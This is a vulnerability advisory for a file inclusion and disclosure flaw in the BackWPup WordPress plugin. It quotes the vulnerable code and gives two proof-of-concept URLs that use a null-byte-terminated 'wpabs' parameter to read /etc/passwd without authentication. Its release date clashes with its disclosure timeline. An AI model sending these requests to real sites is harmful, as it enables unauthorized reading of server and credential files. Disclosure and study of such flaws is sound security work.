=============================================
- Release date: Feb 28th, 2010
- Discovered by: Danilo Massa
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
BackWPup Wordpress plugin <= 1.4.0 File content disclosure

II. BACKGROUND
-------------------------
BackWPup 1.4.0 is a full-featured backup management solution for Wordpress. 
The plugin provide:
- Database Backup
- WordPress XML Export
- Optimize Database
- Check\Repair Database
- File Backup
- Backups in zip,tar,tar.gz,tar.bz2 format
- Store backup to Folder
- Store backup to FTP Server
- Store backup to Amazon S3
- Store backup to RackSpaceCloud
- Store backup to DropBox
- Send Log/Backup by eMail
 
III. INTRODUCTION
-------------------------
BackWPup version 1.4.0 (and may be the previous ones too) has an unfiltered 
parameter inside 

two php pages that let a remote user to access sensitive files like /etc/passwd.
No authentication required. No plugin activation required.

IV. DESCRIPTION
-------------------------
Input passed via the "wpabs" parameter to the php pages
- wp-content/plugins/backwpup/app/options-view_log-iframe.php
- wp-content/plugins/backwpup/app/options-runnow-iframe.php
is not sanitized before being used.

Both files starts trying to include the wp-load.php file using the wpabs 
parameter that can
be inject with a direct call to the page.

options-view_log-iframe.php:
<?PHP
if (file_exists($_GET['wpabs'].'wp-load.php') and file_exists($_GET['logfile'])) 
{
 require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...
options-runnow-iframe.php:
if (file_exists($_GET['wpabs'].'wp-load.php') and 
is_numeric(trim($_GET['jobid']))) {
 require_once($_GET['wpabs'].'wp-load.php'); /** Setup WordPress environment */
...

inserting a string terminator %00 inside the wpabs parameter is possible to 
specify a file
name instead of a directory and let it being included in the web page.
NOTE: also the 

V. PROOF OF CONCEPT
-------------------------
Below is a harmless test that can be executed on a Unix machine that hosts 
wordpress with the
vulnerable plugin.
http://<wordpress_site>/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1


http://<wordpress_site>/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd

Both of them will display the /etc/passwd file.

VI. BUSINESS IMPACT
-------------------------
An attacker could exploit the vulnerability to retrieve virtually any text file 
accessible by the wep application server user.

VII. SYSTEMS AFFECTED
-------------------------
Version 1.4.0 is vulnerable.
Versions <1.4.0 could be vulnerable.

VIII. SOLUTION
-------------------------
Upgrade to a patched release or as quick workaround enclose 
any $_GET['wpabs'] in a trim call like this:
if (file_exists(trim($_GET['wpabs']).'wp-load.php') and 
file_exists($_GET['logfile'])) {

IX. REFERENCES
-------------------------
http://wordpress.org/extend/plugins/backwpup/
http://danielhuesken.de/portfolio/backwpup/

X. CREDITS
-------------------------
The vulnerability has been discovered by Danilo Massa
danilo(under_score)m(at)yahoo(dot)com

XI. VULNERABILITY HISTORY
-------------------------
January 28th, 2011: Vulnerability identification
January 30th, 2011: Vendor notification
January 30th, 2011: Vendor release an updated version (1.4.1)
February 28th, 2011: Vulnerability disclosure
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this  
information.